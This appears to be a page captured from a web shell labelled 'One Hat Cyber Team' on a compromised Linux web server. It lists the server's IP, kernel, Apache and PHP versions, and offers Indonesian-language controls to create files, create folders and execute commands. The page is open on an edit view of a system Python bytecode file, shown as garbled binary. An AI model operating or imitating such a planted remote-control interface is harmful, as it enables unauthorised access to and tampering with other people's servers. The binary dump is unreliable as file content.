One Hat Cyber Team
Your IP :
10.30.1.1
Server IP :
103.148.201.5
Server :
Linux web-olt 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Server Software :
Apache/2.4.52 (Ubuntu)
PHP Version :
8.1.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
lib
/
python3
/
dist-packages
/
gyp
/
__pycache__
/
Edit File:
mac_tool.cpython-310.pyc
o p.a6j � @ s� d Z ddlmZ ddlZddlZddlZddlZddlZddlZddl Z ddl Z ddlZddlZddl Z ddlZdd� ZG dd� de�Zdd � Zd d� Zedkr^e �ee jd d� �� dS dS )z�Utility functions to perform Xcode-style build steps. These functions are executed via gyp-mac-tool when using the Makefile generator. � )�print_functionNc C s* t � }|�| �}|d urt�|� d S d S �N)�MacTool�Dispatch�sys�exit)�args�executor� exit_code� r �./usr/lib/python3/dist-packages/gyp/mac_tool.py�main s �r c @ s� e Zd ZdZdd� Zdd� Zdd� Zdd � Zd d� Zdd � Z dd� Z dd� Zdd� Zdd� Z dd� Zdd� Zdd� Zdd� Zdd� Zd d!� Zd"d#� Zd$d%� Zd&d'� Zd(d)� Zd*d+� Zd,d-� Zd.d/� Zd0d1� Zd2d3� Zd4d5� Zd6d7� Zd8d9� Zd:S );r z�This class performs all the Mac tooling steps. The methods can either be executed directly, or dispatched from an argument list.c C s<